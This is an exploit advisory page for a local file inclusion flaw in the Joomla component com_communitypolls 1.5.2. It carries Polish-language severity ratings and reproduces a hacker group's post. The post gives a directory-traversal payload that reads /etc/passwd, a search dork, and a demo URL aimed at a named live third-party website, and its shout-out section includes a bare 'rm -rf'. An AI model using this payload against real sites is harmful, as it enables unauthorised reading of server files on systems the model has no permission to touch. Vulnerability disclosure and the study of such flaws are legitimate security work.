Joomla Component com_communitypolls LFI Vulnerability

2010.03.25
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

[!]===========================================================================[!] [~] Joomla Component com_communitypolls LFI Vulnerability [~] Author : kaMtiEz (kamzcrew@yahoo.com) [~] Homepage : http://www.indonesiancoder.com [~] Date : 16 February, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://www.corejoomla.com/ [+] Price : free [+] Vulnerability : LFI [+] Dork : inurl:"CIHUY" ;) [+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html [+] Version : 1.5.2 maybe lower also affected [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd%00 [ d3m0 ] http://www.thesearchers.org/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 etc etc etc ;] [!]===========================================================================[!] [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Rawk ! [+] rm -rf [ QUOTE ] [+] we are not dead INDONESIANCODER stil r0x [+] nothing secure .. [+] e0f

Referencje:

http://www.securityfocus.com/bid/38330
http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
http://secunia.com/advisories/38692
http://packetstormsecurity.org/1002-exploits/joomlacp-lfi.txt
http://osvdb.org/62506


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top